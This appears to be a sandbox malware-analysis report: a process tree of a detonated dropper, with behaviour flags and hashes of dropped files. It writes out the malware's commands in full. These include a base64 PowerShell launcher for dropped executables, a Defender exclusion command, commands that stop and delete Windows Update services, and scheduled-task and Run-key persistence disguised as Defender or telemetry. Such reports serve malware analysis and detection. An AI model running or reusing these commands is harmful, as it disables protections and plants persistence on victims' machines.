AAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\wmic.exewmic os get Caption6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C "wmic path win32_VideoController get name"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C "wmic cpu get name"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name7⤵
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"6⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 2883⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv rhW9PRzZrkmM8+DKCWwrAQ.0.21⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4776 -s 6722⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2000 -s 3882⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4772 -s 2322⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2416 -s 4202⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2464 -s 6642⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 216 -s 7962⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3632 -s 6562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5052 -s 4762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4160 -s 4602⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4188 -s 4762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3760 -s 3882⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3820 -s 4882⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2656 -s 4122⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2428 -s 7161⤵
- Program crash
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1491.tmp.csvFilesize
39KB
MD5a62485432dcb6b6f6c90a93667f2daf0
SHA1d1a8e78f441af957ddba7e6d3921d29cd787ddb9
SHA256cd44eb2bbf8ea31e16cfc2027d1e09367b7b1e6bafd14e4d4ee487bbc4ea8515
SHA512dc81f786d094cabd87cf42df1c03cdbbccc52ce03d063c19f91741d821a252e85412e6fbc10260c5c14c57ff4fd04a61cc7f09ca72a3fbc6f5be20557d37f2b0
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER154D.tmp.txtFilesize
13KB
MD51cdcab387448c30b85e2a7717dc0fb10
SHA17089d1d6f16492a21c07f4b2a104f113fef23998
SHA256e7efcc4f8bc2d0b5efd5eda7f54df9e3e651fbcec6838d99d4fe8e5deea34dde
SHA512669c40273e84b6ad5ac9c511d0e76dff8bf1ffeebcdde38fbacfcfdf2e877e19249b745c4f32882a4456dfa0d3114bab8d4e5cdc40adff0b3ec1493287225f01
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER154E.tmp.csvFilesize
39KB
MD5582b5c5ea2895c550e0759d95e34377f
SHA1e48cd70cbfb681b347f007e58d1c8283532da8a0
SHA2568882c0514baa37fc0d3d573e65a6c0a272c0310199b3429737cace8c9abacae2
SHA51281291ec5ebcc7275c2a39cb75780024832d71f5e65bda9d6ec0acd6dbe76031df792d7352f05d0f6e479809a64a723ddadaf6e5caa293c4f3e7e3630fae28bfd
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1678.tmp.txtFilesize
13KB
MD58a23f4526246194a0f3a77774c5960d1
SHA143720094cd0185c5fb1c84be096459d48aac2aca
SHA256545a39a0eb9c3880028767d1959b993895850185b6f5f9b655c4675d33a6bf94
SHA512fd23ceb45423d607f349ca2f3ef04f37bdac8cc5239c30def670aadd391f4390e453586a6d16ef620f0ab5de46c8934c4ef564b68f31e7c9ce1b670a5f00c8dc
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA5B9.tmp.csvFilesize
37KB
MD51aa06bfa81a9568e9f609b7f1d98dda3
SHA16cf63010aa058a43fa57f9d9b9024dbef58b9885
SHA256e5c5674c41ccee78f321bb9a0a85021ef78d7487970384c4d29a99f6a4d00626
SHA512958a1b23720c8a436462a0689386768b8ce43de8b0e21bb83f35e776013964e58f2459757d048bf8f86d597ecebbcbb53722a43da1132ba02a2defcc7c3a6240
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA5F8.tmp.txtFilesize
13KB
MD517e435d4894e5271eb47a0131e33c69b
SHA1edbb556d44a6f5ac6ec55bb10f58b45130d8ab0f
SHA25633191a1df040fb4da5891ea3f16e671a0f6ef4d0eae3dfee445bd7e90096bc5a
SHA5127c76a32efe8706b2646c280acf47a585c1d0d0100737f4190e36bf153cd69d88e79bf20e610bc547083508417184ba3b0611fe92aa0b57d386e18e6a62fc3666
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC62.tmp.csvFilesize
36KB
MD5592330d2b2a4529905749905aa18d98f
SHA13e87c16842a9cfb5b62dff3edf61b14837f7e196
SHA256ef2ca57a3bdeac5b30f1c2a73a10381298fc2ad166191cfbd1a585deaa822041
SHA512aac42b9775c216782ef64d4bb7a5490d13cd55fd7ab92420e25e85aba2f481b20a4c3d53b991c84fc78798c869d7354568eb1eb0870de8e2df9e4a408a306d62
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERACB1.tmp.txtFilesize
13KB
MD56322a6385a99b5555d3e1a08ff3245e6
SHA144ade31d1fad51be1148b653c6119f301f5d6c2c
SHA256b6efc0f41a4d30c86c76b66312440e4eac81da0371e7595dc6a469585931573f
SHA512813ad75c557291e7190cf910107f818dbdec50f106d04c9e103d6e8e38e69f0fed74cd14bc3473d7593a061ff35a2641173be88c6adf9cdf607723138e5e1753
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB1C3.tmp.csvFilesize
37KB
MD54920ea869f445f77c1b1709eb4066b3f
SHA1f5a00fac1b3d2a793cee04bd2cf091c609ded1d3
SHA256a06ce969e1b7526532129544597dfcd6c2c0e09d83aefa47fa519825d33ddd24
SHA51257ef66ccc68842d3ce4c4737a81c4e58979a976bd57cd7aef2099e9deb3f66f392373a72ad222a0dcd90113f63b50c5eeb567424923882846291fd7d271b30a4
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB1F3.tmp.csvFilesize
37KB
MD573281bae9f54eb3cff9ff2fd29334434
SHA1f1f058f88ce32c1623c97e4217b3ea96c82edf80
SHA25612dab69ccb2bced2afb39a9fc1dfc5d1239986d409408fa948f482a0a775d253
SHA5123c6df4be277a933218ee6133d25cb15e213fcbc94c3e712e13ac1439f81087a40bda7933a65450fb6305a64124af0cade9494239ae3ecef9f518f3042342e904
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB213.tmp.txtFilesize
13KB
MD53b0d86f02bad838f48d8c9c8022255b9
SHA1b0be5108ee8ae6ff7f8e1cbc6c5e3f038d3012c0
SHA256cf4543985626ab86c3210bae7c4d88029d03fe26811806800bad4b8b02fc2895
SHA512757130424333f40193eaffa7d627cd22e81646a9766c16533931be9cee88c60e8a9202d3fd3f126bee4f77c3ba25219e66cba4ad0a2c148d333bd5d9d2d41487
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB233.tmp.txtFilesize
13KB
MD5d8feb28fa64c607bc30e92091cc5bb94
SHA1eb41a856c7a726e7c3f883ecf76753ab4018c113
SHA2566cadc1961006a1bac7346d7e04abc434305af0f36e99d58c5730ad12edd3704f
SHA512d800e1e7a6f09bedb98a58a5c72c6eb9d7b8c1fc2c398ddc1c159a4ca0169126cd3d14ff96f5a08683c4d8f2da58fb9c02e098c926ce02126f93a9709c9e30df
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB949.tmp.csvFilesize
37KB
MD5baddddddcff82daaa8573564e0319bb0
SHA1776730f96f0241aa2ebb0615f0818c9db0b420f1
SHA256b70340822136f05d9df08109fcb087ca1970d23a30259bb045131215ba97c29a
SHA5122742175e0b8ea14726dcad1a9c2777cb3256c7e5e4d6c13c078def954c24d6e77f68ec7b9c3401dd84db52ddc0835e2affd65c7bcd11a5ef86d390619c393d3e
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB998.tmp.txtFilesize
13KB
MD5ebe2abc4557f443aa0d3d3f000eec791
SHA187916ac2b955983c501d6d0b664dc00d52f54693
SHA256176f270ada5b7bf0dd8c66c67c2c92f9a3d01f545f1d6915c7446e0b4a880b8f
SHA512f2c7fa397c1ac8be56d5cdda3ced6dfd0dc4d5320a23c5a7547b72d2e447c711e909fa6a5dfba55434a3922526db255eb97308773a6dae15caaeb7108c80cc5b
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC29.tmp.csvFilesize
36KB
MD570e1853d975e3dac20f1fde69b30420d
SHA14709c307557a908bf9193a12ada238071749d548
SHA256760d02067bfca9895614bc87191270ce55ade1574140b66ac226f6ec52182291
SHA51279d6254d1f00ce6e03c6bf1ab1799c8208bd82c6befd56ede94720757196d1c5cb0346235988bc3afce7578ae59fe70da0eaf5d96deccf20a8bd3b2a4a08c68a
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC78.tmp.txtFilesize
13KB
MD54910c0d57138f0f11882450b5316a4f6
SHA1b0b9d7e89cccdfa5288bee51b8e5e30341fcaf7b
SHA256013eca58d2d3af4b7d8d23830e45acf28720c000f20751b3047781756555bd82
SHA512a63cf179669829f90a4217db4a985b68c7ec1f4ce1c9a9746c6964419c4642fb58171436de6c1e562c40ead38c9144e099b91ffeed288bc2ce5701fd10488510
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC592.tmp.csvFilesize
37KB
MD52507dcf7c3549744a23fe5c1a2c526a4
SHA1be5e25cf166b928f5d8c7c9d6dcb0edbbc9a8cdc
SHA2561e26c366a49c1f7b91509b34250731aebcd98bc7e532e80695327427c44226b4
SHA5123fcfeb87de41d864b852fe6609d7f56f18ad7b1efc9e5deffd046d731260b1cd133aedfd62aa0061d6367dab660cbab2655b3046d56ad8059a869d94ce48eaf3
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC5F0.tmp.csvFilesize
37KB
MD56aef6c7ec346a5cc762f9ae807a94d9f
SHA198a61d48127499e37610e65bed5d4bd02742fa69
SHA256cfa84f07cae2c30023e29e56cbe2587a77e1c1cd27dc2d7751b9401af14a323a
SHA51259916c424e892b7d9444327d448587ddf278cc851f8559e198f3569c1bc6be53bc157c7c4fe3f729ebbea08284ceddfbafeb44d01bdecfdf2b7c8f4274af4876
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC601.tmp.txtFilesize
13KB
MD5ff6f2aa13be70c42e750e52a2552815f
SHA19847d4ea99ee66170e0fd9d84c8e7be9d937ed32
SHA256332af49c3605809e0ece3555bf7baf8a67aee65563a926331dfeacfba6242764
SHA51271b7ac121f853b871b9ae76ba8004fb3778077639ebf2fa2fd934c71d52cd4c9ebc3d7fd88ffd740380d09ddb4c2b0f3bff3b6eec9359512936f3e37096f4632
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC70C.tmp.txtFilesize
13KB
MD5278fe051cfbc6c6defc72ccdf96595ab
SHA15e6a297e5b3efce8654cd4e37b7b5e0de154cea8
SHA256c7eb6b0d2d8530cdf52a35a734c14d92cdd9f42f50748989c398cc564926c65a
SHA512f9cec7b9e10672a568e39097fd6e73036751c4532c2f75a12e7198f5cbd6b5f61bdc837060c8fbd46de90b938d4107a7eb7c1be20d3132b5902d4a97c15b35f1
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCFB7.tmp.csvFilesize
36KB
MD58ad5ec7866c3009a4b4c689692a58801
SHA1ed3b134250d4b6742eb608084ac1efd8fc16eac7
SHA25677a76c99098f81e56e82b31fb3e04a3fbfcf8af7c05559d23a5b8560f1b4bf67
SHA512065c195c61ab764e747591fa28b8e49382ad0126ef93fbf490f72ae34d0db2288b034ae2b9f930a8bb96063362fa052d2cb2212fbcd4fbd2554cbdf0f60f2965
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD006.tmp.txtFilesize
13KB
MD5d53bb250b8eaf5c899ebd48a27334050
SHA150d93bf10aa6fd01408f336ba3a016dcf9655988
SHA256261578710d160c7f6f3fc60294f494bbdab3c3408ce6dc4c2b20302718760c08
SHA512cd51bbda97243b8b10c975a730f35b1296145c46e0d5a18feb5a0a16269fe74ed55a8c573510837f5690946e3bd877d01bdb7e10621e7922a217e2dd3da62903
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD77A.tmp.csvFilesize
36KB
MD575d62050306e6a5cfa51f681fdde4510
SHA13f5523db9453ed0ba0a5a4448ac3e3423415958c
SHA25671083f6b46281e2f82e7e37fe12ffed2b6bba8aa0e6920aa87737eee15ec5615
SHA512e795d917971daaa69a72830be7393b3ff7933bceab13f0c5e01503f3c7a9f6bb783641faae60d0d90e08f6b4a86eebce58b3c2702111fdd6ae29a6714cdb4867
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD7C9.tmp.txtFilesize
13KB
MD5530cef2eb08b05f6e364b1830e198da3
SHA1367ddbc9c9287d8e37c5500cf862029fbf82053a
SHA2568916b400e967c35f5c7dde7adddb968612d8e0e9775be5dcb47e6fa622b33b39
SHA512d2768cf93d8b63b5438f62ee0c4e684a3d8ee0ac7f58638ea4d36037c5cb58956cdc61e9f6f691f94bfd0f0ccf7d9210ea69e817e83447e25250f5d95723a3e1
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE23A.tmp.csvFilesize
36KB
MD5412a2db430b93656cc0c7985c05a2213
SHA1a69ab0c1fb632218a89166ebf78797f40ce6c059
SHA256a5be59267897e106b683e8e54c9551614974f265b9570872ceaa57c8c68709fa
SHA51289fb02e84a654dd1a12adbf0403f73c187bfab6171335550cb23f1c838e75496deb59e75967ebc49e31a2810d36deac97c5627ad1cd0061a3234ddd93ab06fc3
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE2B8.tmp.txtFilesize
13KB
MD5ef371f3a8a6e93bc4c73b7a76b433e65
SHA1ed08ca92f64f0209a84fcd0349fd6a0859f5258a
SHA256badb1040052c597c5619eb1c32f7e3e23fe52c4b5293d38371afde918836dfa8
SHA512c5d3422c8fc2091ae665dd55e9d3b73944651e23c3fd615768b91f1144cf352acf63bbe45dc9aeda225e7a40a017cd485aea71ae426630bd9111a7e6156e6b6b
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREEA0.tmp.csvFilesize
36KB
MD50021cbda88b9e91c1bddece237a15551
SHA16b88954746960def5894a880b099cc38fc97518d
SHA256b0747b60c660b0e8db3de38848841b97bbc2b3071e497d5d24e46f30bbb38de7
SHA512cefb69c6ccc56861215aac360a95c7f0cf507827b90421197769202bccc7e566a30b7058efdac19a61d7f079069dcfde4abc62579d7bc2fda56ffc0f374507e8
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREEEF.tmp.txtFilesize
13KB
MD56f2c689cb76cb1e2517a549007473a08
SHA16c3f79e73c5d2407393a9e246fe88820d929a9c4
SHA25675e67313b5d2ead135c2b0448e6033ca36bdfde1d7acc658d535f3ce6bfc689c
SHA512764f78fa3ce280895e00c3915419f31704719f20c64b30391c106992de66c02f7f6c814d75da882b2e4ab2dfe4cf2aa5d95717285223aa37f95269cdfdb67e1b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
19KB
MD537d4e6dc9153c3092b8a8c4059ee1422
SHA1a5bc9d61f65f7c99d6aa208313043eda2389e080
SHA25644298cea8d4086900648d3ef441d5f2d317f6c405cff7248e385802c21de175d
SHA5122b139058bfc1b547cf7904f831af9e5c05061af92dbd0f3489c77d09c6ef23265aa83753655a7a75d742db22d383a911798c192a834f9b9a50d9c36b7028638c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
948B
MD5a7ce8cefc3f798abe5abd683d0ef26dd
SHA1b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
